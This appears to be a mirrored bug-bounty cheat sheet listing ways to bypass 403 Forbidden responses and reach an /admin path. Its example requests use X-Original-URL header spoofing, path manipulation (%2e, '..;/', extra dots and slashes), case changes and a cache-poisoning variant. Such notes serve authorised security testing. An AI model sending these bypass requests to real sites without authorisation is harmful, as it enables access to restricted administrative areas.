mirror of
https://github.com/daffainfo/AllAboutBugBounty.git
synced 2024-12-18 18:36:12 +00:00
963 B
963 B
403 Forbidden Bypass
- Using "X-Original-URL" header
GET /admin HTTP/1.1
Host: target.com
Try this to bypass
GET /anything HTTP/1.1
Host: target.com
X-Original-URL: /admin
- Appending %2e after the first slash
http://target.com/admin => 403
Try this to bypass
http://target.com/%2e/admin => 200
- Try add dot (.) and slash (/) in the URL
http://target.com/admin => 403
Try this to bypass
http://target.com/admin/. => 200
http://target.com//admin// => 200
http://target.com/./admin/./ => 200
- Add "..;/" after the directory name
http://target.com/admin
Try this to bypass
http://target.com/admin..;/
- Try to uppercase the alphabet in the url
http://target.com/admin
Try this to bypass
http://target.com/aDmIN
- Via Web Cache Poisoning
GET /anything HTTP/1.1
Host: victim.com
X-Original-URL: /admin
Source: @iam_j0ker